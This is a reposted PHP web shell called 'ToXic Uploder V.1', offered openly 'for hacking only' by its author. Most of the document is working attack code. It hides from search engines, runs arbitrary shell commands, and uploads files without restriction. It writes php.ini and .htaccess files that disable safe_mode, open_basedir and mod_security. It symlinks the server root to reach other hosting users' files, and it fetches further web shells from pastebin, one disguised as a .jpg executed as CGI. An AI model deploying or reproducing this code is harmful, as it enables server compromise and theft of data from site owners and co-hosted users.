facebook facebook twitter rss

ToXic Uploder V.1 Script

Author: Cyb3r V3n0m , Published: 01-01-2014

<?php

#============= >  Start ToXic Uploder V.1 Script .
/*
To all Script Kiddies .. Changing The "Made By" Headers Wont Make You The Coder ... !! 
Respect The Coderz .. !!! 

Note : ToXic Uploder Was Intended To Be Used For Hacking Only,
Author Is Not Responsible For Any Damage It May Cause And User Holds Full Responsibility
Of His/Her Actions. 
ToXic Uploder Is a Simple PHP Shell With Some Unique Features Like Safe Mode & 
Security Killer , Mass Uploder , Perl Bypasse etc.
This Uploader Has Immense Capabilities And Have Been Written With Some Coding Standards In Mind
For Better Editing and Customization.

#==== > [ Moroccan Special Black Forces ] [ Cyb3r V3n0m ] [ cyb3r.v3n0m@gmail.com ] 
*/
$auth_pass "637ba78dfa47e9b2c9070351dfd77b96";
$color "#00ff00";
$sec 1;
@
session_start();
@
error_reporting(0);
@
ini_set('error_log',NULL);
@
ini_set('log_errors',0);
@
ini_set('max_execution_time',0);
@
set_time_limit(0);
@
set_magic_quotes_runtime(0);
# ======>  Anti Crawler 
if(!empty($_SERVER['HTTP_USER_AGENT']))
{
    
$userAgents = array("Google""Slurp""MSNBot""ia_archiver""Yandex""Rambler");
    if(
preg_match('/' implode('|'$userAgents) . '/i'$_SERVER['HTTP_USER_AGENT']))
    {
        
header('HTTP/1.0 404 Not Found');
        exit;
    }
}
echo 
"<meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW\" />";
/*=============================*/
if(isset($_POST['log']))    
        {
 
session_destroy();
die(
'Se You Soon ! ');
        }    
//---------------------------------
function printLogin() {
?>

<style>input { margin:0;background-color:#fff;border:1px solid #fff; }</style>
<form method=post><input type=password name=pass></form>
<?php
exit;
}
if(
$sec == && !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])]))
    if( empty( 
$auth_pass ) ||
        ( isset( 
$_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
        
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else 
        
printLogin();
print 
"<title>[ ToXic Uploder V.1 ] [ Cyb3r V3n0m ]</title>
<style type=text/css>
div#container{   width: 931px;   position: relative;   margin-top: 0px;   margin-left: auto;   margin-right: auto;   text-align: left;}
body{   text-align: center;   margin: 0;   background-color: #000000;    color: #000000;}
input {border            : dashed 1px;border-color        : #333;BACKGROUND-COLOR: Black;font: 8pt Verdana;color: Red;}
input:hover  { background:#1e1e1e;border:solid 0px #86CC50; }
a {color: #518413;text-decoration:non;}
a:hover{background:#1e1e1e;color: #f00;text-decoration:none;}
textarea{width: 500px; height: 230px; border: 1px #424242 dotted;background-color: #111111;color: #999999;font: 9pt Verdana;}</style>"
;
//================================================= Server Information ===========================//
print "<br><center><table bgcolor=#111111 style=\"border:1px #000000 solid \" width=51% height=%>
<table bgcolor=#000000 style=\"border: dotted 1px;border-color: #424242 \" width=90% height=%><tr><td><div><b>
<div><center><span style=color:#00BFFF;font-family:Verdana;font-size:11px;> "
;
//===
if(ini_get('safe_mode') == '1'){echo '|<font color="#ff0000"> Safe mode :</font><b class="tul"><font color="red"> ON&nbsp;</font></font></b>|';}
else{echo 
'|<font color="#b4b4b4"> Safe mode :</font><b class="tul"><font color="00bb00"> OFF&nbsp;</font></b>|';}
//===
if(!ini_get('open_basedir') != "on"){echo '<font color="#ff0000"> Open_basedir :</font><b class="tul"><font color="red"> OFF&nbsp;</font></b>|';}
else{echo 
'<font color="#b4b4b4"> Open_basedir :</font><b class="tul"><font color="00bb00"> ON&nbsp;</font></b>|';}
//===
if(function_exists('curl_version')){echo '<font color="#b4b4b4"> Curl :</font><b class="tul"><font color="00bb00"> ON&nbsp;</font></b>|';}
else{echo 
'<font color="#ff0000"> Curl :</font><b class="tul"><font color="red"> OFF&nbsp;</font></b>|';}
//===
if(ini_get('magic_quotes_gpc') == '1'){echo '<font color="##ff0000"> Magic_quotes_gpc :</font><b class="tul"><font color="red"> ON&nbsp;</font></b>|';}
else{echo 
'<font color="#b4b4b4"> Magic_quotes_gpc :</font><b class="tul"><font color="00bb00"> OFF&nbsp;</font></b>|';}
//===
if(function_exists('exec')){echo '<font color="#b4b4b4"> Exec :</font><b class="tul"><font color="00bb00"> ON&nbsp;</font></b>|';}
else{echo 
'<font color="#ff0000"> Exec :</font><b class="tul"><font color="red"> OFF&nbsp;</font></b>|';}
//===
if(function_exists('symlink')){echo '<font color="#b4b4b4"> Symlink :</font><b class="tul"><font color="00bb00"> ON&nbsp;</font></b>|';}
else{echo 
'<font color="#ff0000"> Symlink :</font><b class="tul"><font color="red"> OFF&nbsp;</font></b>|';}
//===
echo '<font color="#b4b4b4"> Software : </font>';echo '</font><b class="tul"><font color="00bb00">'; echo getenv("SERVER_SOFTWARE");echo'</font></b> |';
//===
print "</td></tr></table></form></td></tr></table>" ; print"</table></center></span></div>" 
//================================================= Uploader + Tools HTML ===========================//
print"<img src=http://i802.photobucket.com/albums/yy302/Cyb3r_V3n0m/c330_zps88eabba2.jpg id=Image1 alt= style=width:650px;height:320px;></div>"// ZiNoX_412
//== Tools HTML ==//    
print "<center><div><form method=post>
        <input type=\"submit\" value=\"Execute Command\" name='cmd'>
        <input type=\"submit\" value=\"Cgi-Telnet 1.4\" name='generatePerl'>
         <input type=\"submit\" value=\"b374k-2.7\" name='generateb374k'>
        <input type=\"submit\" value=\"SymLinker\" name='generateSER'>
        <input type=\"submit\" value=\"INI.PHP\" name='iniphpGenerate'>
        <input type=\"submit\" value=\".HTACCESS\" name='htaccessGenerate'>
        <input type=\"submit\" value=\"PHP.INI\" name='phpiniGenerate'>
        <input type=\"submit\" value=\"About ToXic\" name='about'>
        <input type=\"submit\" value=\"Log Out\" name='log'>
        </form></form>"
;
//==============//
print"<table bgcolor=#cdcdcd style=\"border:1px #000000 solid \" width=65% height=%>";
print
"<table bgcolor=#000000 style=\"border: dotted 1px;border-color: #424242 \" width=65% height=%>";
print
"<tr><td>"
print
"<center><div><b>";
print
"
    <td valign='top'>
    <!-- Upload Files -->
     
    <form enctype=multipart/form-data  method=POST>
    <br>
    <table width='100%' height='72' border='0'  id='Box'><tr>
    <td width=4% height=21 style=background-color:red>&nbsp;</td>
    <td style='background-color:#111111;10px;'><center><span style=color:#518413;font-family:Verdana;font-size:11px;>There Is Something You Must Know It Your Security Is 100% But With Me 0%</h></div></td>
    <td width=4% height=21 style=background-color:red>&nbsp;</td>
    </tr><tr><td height='45' colspan='2'>
    <br><br><center>
    <input type=\"file\" name=\"uploadfile[]\">
    <input type=\"file\" name=\"uploadfile[]\">
    <input type=\"file\" name=\"uploadfile[]\"><br>
    <input type=\"file\" name=\"uploadfile[]\">
    <input type=\"file\" name=\"uploadfile[]\">
    <input type=\"file\" name=\"uploadfile[]\"><br><br>
    <input type=submit name=upload class=small button id=upload value=Upload />
    </td></tr></table></form>
    <!-- End Of Upload Files -->
    </td></tr></center>
</table>"    
;
//================================================= Uploader +Tools PHP ===========================//    

# ======>   Upload Files

if(isset($_POST['upload']))        
 {
    for (
$i 0$i count($_FILES['uploadfile']['name']); $i++) {
        if(
$_FILES['uploadfile']['name'][$i] != '') {
            if(
function_exists('copy')){$upload copy($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
            else{
$upload move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
            if(
$upload) {echo "<br><div><span style=color:#6ebe0b;font-family:Verdana;font-size:11px;>The File : ".basename($_FILES['uploadfile']['name'][$i])." Uploaded Successfully !</span></div>";}
            else { echo 
"<br><div><span style=color:#ee0c17;font-family:Verdana;font-size:11px;>The File : ".basename($_FILES['uploadfile']['name'][$i])."  Can't Be Upload ! </span></div>";}
        }    }        }

# ======>   Kill Security  <======= #

function GenerateFile($name,$content)
{
    
$file = @fopen($name,"w+");
    @
fwrite($file,$content);
    @
fclose($file);
    return 
true;
}
$ini_php="<?
echo ini_get(\"safe_mode\");
echo ini_get(\"open_basedir\");
include(\$_GET[\"file\"]);
ini_restore(\"safe_mode\");
ini_restore(\"open_basedir\");
echo ini_get(\"safe_mode\");
echo ini_get(\"open_basedir\");
include(\$_GET[\"ss\"]);
?>"
;
# =====> php.ini
if(isset($_POST['phpiniGenerate']))    
        {
GenerateFile("php.ini",
"safe_mode = Off
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF"
);
$link="<br><a href=php.ini target='_blank'><div><span style=color:#6ebe0b;font-family:Verdana;font-size:11px;>Click On This Link To Run PHP.INI</span></div></a>";
echo 
$link;        }
# =====> .htaccess
if(isset($_POST['htaccessGenerate']))    
        {
@
mkdir("access"0755);
@
chdir("access");        
GenerateFile(".htaccess",
"<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>" 
);
echo 
"<br><div><span style=color:#6ebe0b;font-family:Verdana;font-size:11px;>.htaccess Has Been Generated Successfully</span></div> ";
                 
        }
# =====> ini.php
if(isset($_POST['iniphpGenerate']))             
        {
GenerateFile("ini.php",
"$ini_php");

echo 
"<br><a href=ini.php target='_blank'><div><span style=color:#6ebe0b;font-family:Verdana;font-size:11px;>Click On This Link To Run ini.php </span></div></a>";
           
        
        }
# =====> Server Shortcut
if(isset($_POST['generateSER']))

        {
@
mkdir('Cyb3r'0777);
$hta="Options all\n
      DirectoryIndex Sux.html\n
      AddType text/plain .php\n
      AddHandler server-parsed .php\n
      AddType text/plain .html\n
      AddHandler txt .html\n
      Require None\n
      Satisfy Any"
;
$htaccess=@fopen('Cyb3r/.htaccess''w');
fwrite($htaccess$hta);
@
symlink("/""Cyb3r/root");
$akps=@file("/etc/named.conf");
if(!
$akps)
{
    die(
'<script>alert("Cyb3r V3n0m :~# /etc/named.conf Not Found ! ")</script>');
}
echo 
"<div class=container><br /><font size=4>[+] Total Domanis Found: </font><font color=red>".count($akps)."</font><br /><br /><table align=center border=1 width=59% cellpadding=5><tr><td>Domains</td><td>Users</td><td>Exploit</font></td></tr>";
foreach(
$akps as $akp)
{
    if(
eregi("zone"$akp))
    {
        
preg_match_all('#zone "(.*)" #'$akp$akpzz);
        
flush();
        if(
strlen(trim($akpzz[1][0]))>2)
        {
            
$user=posix_getpwuid(@fileowner("/etc/valiases/".$akpzz[1][0]));
            echo 
"<tr><td><a href=http://www.".$akpzz[1][0]." target=_blank>".$akpzz[1][0]."</a><td>".$user['name']."
            </td><td><a href=/Cyb3r/root/home/"
.$user['name']."/public_html/ target=_blank>SymLink</a></td></tr>";
            
flush();
        }
    }
}

               
        }
# =====> Generate Cgi-Telnet 1.4  

if(isset($_POST['generatePerl']))
        {
@
mkdir("cgi"0755);
@
chdir("cgi");
$cgi_2 "http://pastebin.com/raw.php?i=6ELN8bjS";
$file file_get_contents($cgi_2);
$open fopen("Cgi-14.jpg" 'w');
fwrite($open,$file);
fclose($open);
if(
$open) {
echo 
"<br><b><a href=cgi/Cgi-14.jpg target='_blank'><div><span style=color:#6ebe0b;font-family:Arial;font-size:11px;>Click On This Link To Open Cgi-Telnet 1.4 </span></div></a></b>";
$htaccess fopen(".htaccess","a+");
fwrite($htaccess,
"Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .jpg
AddHandler cgi-script .jpg"
);
fclose($htaccess);            
        }    
        }    
# =====>    b374k-2.7    
if(isset($_POST['generateb374k']))
        {

@
mkdir("b374k"0755);
@
chdir("b374k");                      
$b374k_2 "http://pastebin.com/raw.php?i=WKw38H5D";
$file file_get_contents($b374k_2);
$open fopen("b374k.php" 'w');
fwrite($open,$file);
fclose($open);
if(
$open) {
echo 
"<br><b><a href=b374k/b374k.php target='_blank'><div><span style=color:#6dc205;font-family:Arial;font-size:11px;>Click On This Link To Open b374k 2.7 </span></div></a></b>"; }
           }
# =====>    CMD
if(isset($_POST['cmd']))    
        {


if(isset(
$_REQUEST["cmd"]))
{
$cmd=$_REQUEST["cmd"];
echo 
'<br><textarea>'shell_exec($cmd),'</textarea>';
if(empty(
$cmd))
{
echo 
'<script>alert("Empty Command Cannot Execute!!!")</script>';
}
}
?>

</div>
<div class="cmd">

<form class="form" vertical-align="center" action="" method="post">
<input name="cmd" type="text" size="70">
<br><br><input type="submit" value="Execute">
</form>
<?php
        
}        

//=======================================================//
/*=============================*/
if(isset($_POST['about']))    
        {
print
"<br><br>
<marquee direction=up scrollamount=1 bgcolor= #111111 width=100% height=150><center>
<p><span style=color:#518413;font-family:Arial;font-size:12px;>
[+]=======================[  IN THE NAME OF ALLAH  ]=======================[+] <br><br>
[~] About ToXic Uploader V.1 [~] <br><br>
Privat Uploder, This is a Hidden Uploader <br>
ToXic Uploder Is a Simple PHP Shell With Some Unique Features Like<br>
Safe Mode & Security Killer , Mass Uploder , Execute CMD Perl Bypasse etc. <br><br><br>
[~] Special Thanks To My Best FriendS [~] <br><br>
==== > BlackBase - Volcano HaCker - Z!k-FriD - S3C-T3rr0r - Nor15din - Hicham Zaz <==== <br><br>
[+]=======================================================[+]<br><br>
Greet'z To :<br><br>[+]  Younes Lmaghribi , X-Line , V!ru$ No!r , M3GAFAB ,  Mr.Pato , Mr.Alsa3ek ,Cloudx . [+]<br><br><br>
[+] ====[ AnonGhost Team - Dark Cyber Crow - Moroccan Ghosts Team ]====[+]<br><br>
[~]==== Date : 01 - 01 - 2014 ====[~]<br>
</font></b></p>
</center>
</marquee>
<br>"
;
        }    
/*=============================*/
//===================================================End ==================================//
?>

<br><br><div style="padding:10px;border-bottom:0px solid #fff;border-top:0px solid #ddd;background:#111111;">
<span style=color:#a7a7a7;font-family:Arial;font-size:12px;>
Coded By : <a title="Hacker !! No, I m Just a Skeleton Facing His Pregnant Wife. My Child Name Will be C330.php" href="https://www.facebook.com/Cyb3r.V3n0m" target="_blank"><?php echo str_replace('.','','C.y.b.3.r. .V.3.n.0.m');?> </a>. Copyright (C) 2014 <a title="[ MSBF ] Is a Multi-Specialties Team [ Hacking - Programming - Designing - ... ] From Morocco . "href="https://www.facebook.com/Moroccan.S.B.F" target="_blank">Moroccan Special Black Forces [MSBF]</a> All Rights Reserved.
<span ></div>

Like us on Facebook :